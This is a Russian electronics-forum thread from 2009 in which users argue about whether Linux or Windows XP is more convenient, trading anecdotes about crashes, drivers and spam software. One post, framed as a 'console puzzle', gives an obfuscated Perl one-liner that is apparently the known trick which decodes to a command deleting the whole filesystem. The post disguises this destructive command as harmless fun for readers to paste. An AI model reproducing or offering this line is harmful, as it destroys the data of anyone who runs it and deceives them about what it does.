Реклама на сайте English version  DatasheetsDatasheets

KAZUS.RU - Электронный портал. Принципиальные схемы, Datasheets, Форум по электронике

Новости электроники Новости Литература, электронные книги Литература Документация, даташиты Документация Поиск даташитов (datasheets)Поиск PDF
  От производителей
Новости поставщиков
В мире электроники

  Сборник статей
Электронные книги
FAQ по электронике

  Datasheets
Поиск SMD
Он-лайн справочник

Принципиальные схемы Схемы Каталоги программ, сайтов Каталоги Общение, форум Общение Ваш аккаунтАккаунт
  Каталог схем
Избранные схемы
FAQ по электронике
  Программы
Каталог сайтов
Производители электроники
  Форумы по электронике
Помощь проекту

Делимся опытом Наступив на грабли - сообщи другим! Обмен опытом разработки и ремонта электронных устройств.

Результаты опроса: Какая ОС удобнее Linux или Windows Xp
Linux 578 46.61%
Конечно Windows Xp 662 53.39%
Голосовавшие: 1240. Вы ещё не голосовали в этом опросе

 
Опции темы
Непрочитано 01.10.2009, 21:18  
mtit
Почётный гражданин KAZUS.RU
 
Аватар для mtit
 
Регистрация: 21.03.2007
Адрес: М.(осква)
Сообщений: 4,264
Сказал спасибо: 2,113
Сказали Спасибо 1,720 раз(а) в 975 сообщении(ях)
mtit на пути к лучшему
По умолчанию Re: Linux-ваше мнение

Так всё просто. Результат опроса стремится (по закону больших чисел) к истинному значению (вероятности). Это 50%. Позволяют себе голосовать только те, кто имел ДОСТАТОЧНЫЙ опыт общения с обоими системами. Надо поставить ещё два пункта: имею опыт общения только с Вин, только с Лин. Тогда и станет ясно. Мой опыт - ОпенОфис. Тормозит под Виндос. Напрягло - остался с вордом и экселем.
__________________
+ 7 903 641 87 25// 1. Иногда отвечаю "по памяти" 2. Часто заблуждаюсь >> Критикуйте, не обижусь.
mtit вне форума  
Сказали "Спасибо" mtit
R666 (11.10.2009)
Непрочитано 01.10.2009, 21:33  
GNN
Прописка
 
Регистрация: 29.06.2006
Сообщений: 218
Сказал спасибо: 34
Сказали Спасибо 65 раз(а) в 37 сообщении(ях)
GNN на пути к лучшему
По умолчанию Re: Linux-ваше мнение

Сообщение от oldzren
-----------------------------------------------------------------------
О командной строке: начинающему пользователю проще скопипастить команду, подсказанную опытным пользователем, в командную строку и нажать Enter, чем выслушивать "мышкой туда-сюда, правая-левая кнопка, надцатая закладка, энный чекбокс". ИМХО
-----------------------------------------------------------------------
Если уж всё дело в командной строке, пожалуйста, изучайте:
Вложения:
Тип файла: zip Командная оболочка XP.zip (594.9 Кб, 477 просмотров)

Последний раз редактировалось GNN; 01.10.2009 в 22:05.
GNN вне форума  
Эти 5 пользователя(ей) сказали Спасибо GNN за это сообщение:
bbill_ (02.10.2009), DVD-RW (03.10.2009), eterna (11.10.2009), mikesmith (02.10.2009), pinco (20.11.2011)
Непрочитано 01.10.2009, 23:57  
b_raven
Гражданин KAZUS.RU
 
Регистрация: 02.11.2008
Адрес: Одесса
Сообщений: 668
Сказал спасибо: 336
Сказали Спасибо 328 раз(а) в 182 сообщении(ях)
b_raven на пути к лучшему
По умолчанию Re: Linux-ваше мнение

Сообщение от tauro Посмотреть сообщение
Неоднократно пытался освоить Linux (Ubuntu). Наверное, просто не смог выделить столько времени, чтоб досконально со всем разобраться... Но однозначно сделал вывод, что система не для дома. Последний раз, после трехдневного чтения факов, мануалов и плясок с бубном так и не смог поставить дрова на видео от Ati. Все было красиво и безглючно на протяжении всего процесса установки, но до перезагрузки, после чего начиналась ругань и запуск на втроенных в систему драйверах... Ставил на ноут (Acer Aspire 5310) - не смог победить проблемы со звуком...
При этом с компами всю жизнь, от MS-Dos и до Windows Server 2008...
зря с убунтой возитесь, батенька
не знаю кем и для кого сей дистрибутив был придуман - но в нем как-то всё через задницу
b_raven вне форума  
Непрочитано 02.10.2009, 00:02  
b_raven
Гражданин KAZUS.RU
 
Регистрация: 02.11.2008
Адрес: Одесса
Сообщений: 668
Сказал спасибо: 336
Сказали Спасибо 328 раз(а) в 182 сообщении(ях)
b_raven на пути к лучшему
По умолчанию Re: Linux-ваше мнение

Сообщение от Rodrigo_F Посмотреть сообщение
Давно было...Но вот точно помню, что грузился линукс минуты 3...4(ХР- 25...30 сек). И окна внутри системы открывались 3...4 сек.(ХР-практически мгновенно). Дистрибутив Mandrake - три CD-диска - использовал токо два(ХР-шка - диск на 500 Мб) поэтому Mandrake занимала на винте более 3Гб(ХР-шка - около 2-х).
Ну никак не назвать Mandrake шустрее..
с дуру можно и х... сломать

зачем было ставить фулл-инсталл, у меня некогда десктоп со всем необходимым на харде 80 метров кушал... а ну-ка урежьте мне хрюшу до 80 метров

PS десктоп с КДЕ
b_raven вне форума  
Непрочитано 02.10.2009, 03:43  
AlexBazz
Прохожий
 
Регистрация: 17.07.2007
Сообщений: 3
Сказал спасибо: 0
Сказали Спасибо 0 раз(а) в 0 сообщении(ях)
AlexBazz на пути к лучшему
По умолчанию Re: Linux-ваше мнение

Устал я и читать что лучше... Сам работаю и на том и на том.
Вот Задачка для консоли

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=›%-{‹-|}‹&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
AlexBazz вне форума  
Непрочитано 02.10.2009, 05:47  
Gfyfc
Прохожий
 
Регистрация: 09.05.2007
Сообщений: 1
Сказал спасибо: 0
Сказали Спасибо 2 раз(а) в 1 сообщении
Gfyfc на пути к лучшему
По умолчанию Re: Linux-ваше мнение

Господа, научите, как можно Винду убить?! Как ей только не выкручивал руки, но убить - практически невозможно. Или руки не настолько кривые...
Насчет глючности - опять же про руки . Если над ней не издеваться, не проводить сногсшибательных экспериментов (чем я первые годы весьма грешил) - работать будет годами.
Про Линукс. Принес из магазина нетбук с линуксом - при запуске и вис несколько раз. Возиться было некогда, нужен был комп для работы, снес линукс, поставил XP. Все было хорошо.
Но через какое-то время все же решил поработать с линуксом (ручки-то чешутся), восстановился с заводского диска и что же? Да виснет комп при запуске в 10-20% случаев. Опять снес линукс, поставил XP SP3 - работает, не напрягает... Может, мне просто не повезло, не знаю... Но довольно показательно, мне кажется. На десктоп тоже как-то пытался установить Линукс, так и установку до конца не мог завершить, причем не я один (у приятеля получилось с какого-то раза), но всех дров полностью на все железо он так и не нашел). Но с десктопом ладно, можно свалить на юзера (можно и на дистрибутив), а вот из магазина чистый, не работавший комп - он то как может виснуть при загрузки операционки??? Да так, что пока внаглую не отключишь кнопкой - ни на что не реагирует. После этого я и задумался, а зачем мне, собственно, этот Линукс? Ведь все для меня нужное есть в Винде! Вот только если поковыряться, то да. И хочется порой попробовать Линукс (пытливый ум покоя не дает ),но как вспомню про про тот геморрой за мои же деньги - желание отбивает... Хотя один знакомый продолжает пользоваться точно таким же нетбуком с Линуксом, хвалит его. Но однажды я попросил его показать что ж там такого необычайно хорошего, просветить меня, т.к. все же хотелось его, Линукса, попробовать. Он охотно согласился. И что же? Будете смеяться, но при загрузке системы - его комп повис наглухо, ей-богу не вру !!! Когда, после отключения и повторного включения комп все же загрузился - выяснилось, что он не может открыть какой-то нужный офисный документ Опен офисом. Кстати, в Винде Опен офис - тоже не конкурент майкрософтовскому продукту, ИМХО. В общем, не ободрил приятель меня на новые подвиги, а только разочаровал. Сидеть и ковыряться в системе ради самой системы? Кстати, в Винде тоже есть где поковыряться... Ведь большинство пользователей не знают и десятой части ее возможностей (это я скромно говорю - десятой части). А возможности весьма неслабые...
Вот такие невеселые размышления по поводу ОСей. Никого ни за что не хочу агитировать, просто реальные факты описал, не более того. Надеюсь, не очень сильно буду бит
Gfyfc вне форума  
Эти 2 пользователя(ей) сказали Спасибо Gfyfc за это сообщение:
aleksandr-zh (09.10.2009), Alex_Prince (04.10.2009)
Непрочитано 02.10.2009, 08:29  
userZ
Частый гость
 
Регистрация: 29.04.2009
Сообщений: 23
Сказал спасибо: 0
Сказали Спасибо 0 раз(а) в 0 сообщении(ях)
userZ на пути к лучшему
По умолчанию Re: Linux-ваше мнение

Сообщение от Gfyfc Посмотреть сообщение
Господа, научите, как можно Винду убить?! Как ей только не выкручивал руки, но убить - практически невозможно.
Насчет глючности приведу свои примеры....
Дома стояла Windows Vista Ultimate(причем не сборка какая-нибудь кривая типа Zver CD/DVD), ну и весь основной софт как у всех, офис, аудио/видео плееры, антивирус, + игрушки..... Дак вот, приехал ко мне брат + другие гости, а он был в экспедиции(непомню уже где), и привез фотки и видео как там все, ну и начали смотреть на моем ПК, и во время просмотра винда выдала синий экран и перезагрузилась(будь она неладна....), ситуация конечно не из приятных, потому что я сам 3 года ремонтирую компы в фирме(штат 50 человек(это те кто также занимаются ремонтом, а не кого я обслуживаю) в одном филиале, в одном городе) и винду ставил не раз и не два....а уже и не знаю ско-ко раз....много вообщем....... и чего ей надо было.......я еще понимаю если бы я ядро перекомпилировать хотел или таблицу файлов изменить или в памяти системный файлы подправить, но нет.... я просто смотрел фотки....тогда я сильно ее разлюбил(возненавидел даже....), у Linux думаю тоже глюки есть, но такого думаю нету..чтобы на ровном месте(во время просмотра фоток) и синий экран(у Linux вообще по моему синего экрана нет в принципе).

Насчет выбора операционки, из Windows что там выбирать, там всего XP, Vista и 7, если очень мощное железо то XP отпадает, Vista вообще глючит, остается 7(и еще под 64 битной игры некоторые не работают, щас на ней сижу, вроде пока ниче(бывают небольшие сбои, но жить можно), хотя проги некоторые не работают)..вот и выбери тут...., а в Linux....Ubuntu(+ от нее производные: Runtu, Kubuntu, Xubuntu.....), Mandriva, Fedora, OpenSuse, ASP Linux, ALT Linux....и каждый для своих задач и со своими плюсами, так что есть, что попробовать и где развернуться.....
userZ вне форума  
Непрочитано 02.10.2009, 09:25  
Popeye
Почётный гражданин KAZUS.RU
 
Аватар для Popeye
 
Регистрация: 05.08.2007
Адрес: Болгария Перник
Сообщений: 1,771
Сказал спасибо: 74
Сказали Спасибо 357 раз(а) в 245 сообщении(ях)
Popeye на пути к лучшему
По умолчанию Re: Linux-ваше мнение

Не по теме, однако здесь много спецов, может кто ответит стоит ли заниматся ?
По почте пришел спам Boost your Computer Speed with BoostKit | Boost your Computer speed by up to 100% |Open and close applications faster |Switch between applications in no time Reduce slowdowns and waiting time | Что за животное такое ? Реально ли ? Или опять деньги требуют низачто ?
__________________
Мыслю, следовательно существую
Popeye вне форума  
Непрочитано 02.10.2009, 09:43  
userZ
Частый гость
 
Регистрация: 29.04.2009
Сообщений: 23
Сказал спасибо: 0
Сказали Спасибо 0 раз(а) в 0 сообщении(ях)
userZ на пути к лучшему
По умолчанию Re: Linux-ваше мнение

Сообщение от Popeye Посмотреть сообщение
По почте пришел спам Boost your Computer Speed with BoostKit
Если по почте пришло от неизвестного контакта, то 100% вирус/троян/BackDoor, поэтому удали и даже не думай.... а вообще есть проги которые увеличивают производительность ПК, но это не надолго, потом начинает ОС глючить, тормозить ошибки лезут..если реально хочешь что-то оптимизировать, и есть желание и возможности, то найди книгу по реестру и настройки ОС XP, и сам ручками в реестре поменяй значение, и в книге прочитаешь, для чего это и нужно ли это тебе(твоему ПК)...
userZ вне форума  
Непрочитано 02.10.2009, 09:44  
userZ
Частый гость
 
Регистрация: 29.04.2009
Сообщений: 23
Сказал спасибо: 0
Сказали Спасибо 0 раз(а) в 0 сообщении(ях)
userZ на пути к лучшему
По умолчанию Re: Linux-ваше мнение

Сообщение от Popeye Посмотреть сообщение
Одна голова хорошо
а с телом лучше
userZ вне форума  
 

Закладки
Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Интересно любое мнение и совет FOLKSDOICH Источники питания и свет 75 10.10.2011 22:36
Ваше мнение об твердотельном ЖД roog Отвлекитесь, эмбеддеры! 7 04.12.2009 21:23
Ваще мнение об 1804 NA1S Микроконтроллеры, АЦП, память и т.д 4 15.01.2009 19:46
Взаимоотношения начальник-подчиненный. Ваше мнение. vo1 Отвлекитесь, эмбеддеры! 189 20.06.2008 13:26
[Решено] Цифровая паяльная станция - какое мнение? Делимся опытом 16 29.04.2005 22:51


Часовой пояс GMT +4, время: 02:11.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод: zCarot